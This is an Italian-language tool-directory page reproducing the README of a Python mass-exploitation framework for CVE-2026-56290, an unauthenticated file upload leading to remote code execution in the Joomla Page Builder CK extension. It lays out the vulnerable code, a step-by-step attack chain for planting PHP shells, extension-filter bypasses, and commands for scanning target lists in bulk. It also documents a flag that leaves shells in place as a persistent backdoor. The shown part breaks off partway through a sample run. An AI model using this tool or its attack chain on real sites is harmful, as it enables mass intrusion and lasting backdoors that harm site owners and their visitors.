Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit รจ una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilitร , analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

ยทยทFeedยทContattoยทPrivacyยทยฉ 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/shinthink/pbck-exploit
RicognizioneScanner di Vulnerabilitร Framework di ExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubshinthink/pbck-exploit

pbck-exploit

๐Ÿ“ค Framework di sfruttamento di massa per CVE-2026-56290 โ€” Page Builder CK Joomla caricamento di file non autenticato a RCE

Vedi Repository
3142 mesi faNon ancora revisionato

Piรน Popolari

Vedi tutti โ†’

Scopri gli strumenti piรน utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti โ†’
Condividi

PBCK-Exploit โ€” CVE-2026-56290 Joomla Page Builder CK Exploit

Python CVE Licenza

Scoperta CSRF RCE Pulizia Live

Framework di Sfruttamento di Massa & Validazione per Joomla Page Builder CK

Caricamento Arbitrario di File Non Autenticato โ†’ Esecuzione di Codice Remota



๐Ÿ“‘ Indice dei Contenuti

  • Panoramica della Vulnerabilitร 
  • Versioni Affette
  • Funzionalitร 
  • Installazione
  • Utilizzo
  • Prova di Concetto
  • Approfondimento Tecnico
  • Metodologia di Rilevamento
  • Difesa & Mitigazione
  • Disclaimer
  • Riferimenti

๐Ÿ”ด Panoramica della Vulnerabilitร 

CVE-2026-56290 รจ una vulnerabilitร  di gravitร  critica in Page Builder CK (com_pagebuilderck), una popolare estensione per la creazione di pagine in Joomla. Il metodo del controller browse.ajaxAddPicture accetta caricamenti di file non autenticati con un percorso di destinazione controllato dall'utente, consentendo agli attaccanti di scrivere file PHP arbitrari in directory accessibili dal web.

La Causa Principale

// browse.php controller โ€” NESSUN controllo di autenticazione
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // โ† file controllato dall'utente
    $path  = trim($input->get('path', ''));       // โ† path controllato dall'utente, solo trim()!
    // ... carica il file in $path senza convalidare la destinazione
}

Il parametro path subisce solo una sanitizzazione trim() โ€” niente whitelist, niente controllo di path traversal, niente gate di autenticazione. Combinato con un token CSRF pubblicamente accessibile da qualsiasi pagina Joomla, gli attaccanti possono caricare shell PHP da remoto in qualsiasi directory scrivibile.

Impatto

VettoreGravitร Impatto
Caricamento File Non Autenticato9.8 (Critico)Esecuzione arbitraria di codice PHP
Raccolta Token CSRF5.3 (Medio)Abilita la catena di caricamento
Divulgazione di Informazioni5.3 (Medio)Fingerprinting della versione dell'estensione

La Catena d'Attacco

1. COLPISCI la homepage Joomla โ†’ raccogli token CSRF (hex32 + valore "1")
2. POST caricamento file       โ†’ task=browse.ajaxAddPicture&{token}=1
3. La shell PHP atterra in     โ†’ media/com_pagebuilderck/gfonts/shell.php
4. GET URL shell               โ†’ codice eseguito, RCE confermata
5. POST f=@file alla shell     โ†’ carica strumenti aggiuntivi
6. GET ?cleanup=1              โ†’ shell si autodistrugge

๐ŸŸ  Versioni Affette

Versione Page Builder CKStatoNote
3.1.1 e precedenti๐Ÿ”ด VulnerabileCaricamento non autenticato confermato
3.4.10 e precedenti๐Ÿ”ด VulnerabileRange esteso per analisi
3.5.10 e precedenti๐Ÿ”ด VulnerabileAlcune varianti corrette potrebbero esistere
> 3.5.10๐ŸŸข Possibilmente CorrettoVerifica tramite manifest XML

Nota: La versione viene rilevata dal file manifest di Joomla in /administrator/manifests/files/com_pagebuilderck.xml. Se il manifest non รจ accessibile, lo scanner considera il target come potenzialmente vulnerabile.


โœจ Funzionalitร 

๐Ÿ” Ricognizione

  • Rilevamento Joomla โ€” 2 fasi: impronte HTML + sonda pannello amministrazione
  • Rilevamento PBCK โ€” Sonde dirette sui path + pattern matching HTML
  • Estrazione versione โ€” Parsing manifest XML + fallback regex HTML
  • Raccolta token CSRF โ€” Estrazione token da piรน pagine (home, login, registrazione, admin)
  • Brute-force endpoint โ€” 1000+ combinazioni task/param/path con scoperta a budget di tempo

๐Ÿ’€ Sfruttamento

  • 40+ bypass estensione โ€” Giocoleria maiuscole/minuscole, varianti numerate, estensioni doppie, trucchi Windows
  • 20+ percorsi di destinazione โ€” Directory di estensioni, directory scrivibili Joomla, path traversal
  • Convalida shell โ€” Conferma basata su token che PHP esegue
  • Pulizia automatica โ€” Shell si autodistruggono dopo la convalida (?cleanup=1)
  • Output TXT live โ€” Risultati reali thread-safe scritti su file
  • Report JSON โ€” Report strutturato con dettagli completi per target

๐Ÿ“ฆ Installazione

# Clona il repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Installa le dipendenze
pip install -r requirements.txt

# Verifica
python cve_2026_56290.py --help

Requisiti

requests>=2.28.0
urllib3>=1.26.0

๐Ÿ“– Utilizzo

Argomenti da Riga di Comando

CVE-2026-56290 โ€” PageBuilderCK RCE Non Autenticata | Exploit di Massa & Validatore

  -t, --target        URL singolo target
  -f, --file          File con URL target (uno per riga, # per commenti)
  -o, --output        File output TXT live (default: cve-2026-56290_live.txt)
  --json              Percorso file report JSON (default: cve-2026-56290_report.json)
  --threads           Worker concorrenti (default: 20)
  --timeout           Timeout richiesta in secondi (default: 15)
  --no-cleanup        Lascia le shell sul target (backdoor persistente)
  -v, --verbose       Output verbose scoperta endpoint
  --known-endpoint    Salta scoperta: task,file_param,folder_param

Utilizzo Base

# Singolo target
python cve_2026_56290.py -t https://target.com

# Scansione di massa da file
python cve_2026_56290.py -f targets.txt

# Output personalizzato + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Lascia le shell (backdoor persistente)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Salta scoperta con endpoint noto
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

Formato File Target

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# commenti e righe vuote vengono ignorati

๐Ÿงช Prova di Concetto

Scenario 1: Scansione di Massa con Output Live

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  CVE-2026-56290 | 5 target | 20 thread | cleanup=si
  TXT live: live_results.txt
  2026-07-04 15:30:00
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
Scarica lo strumento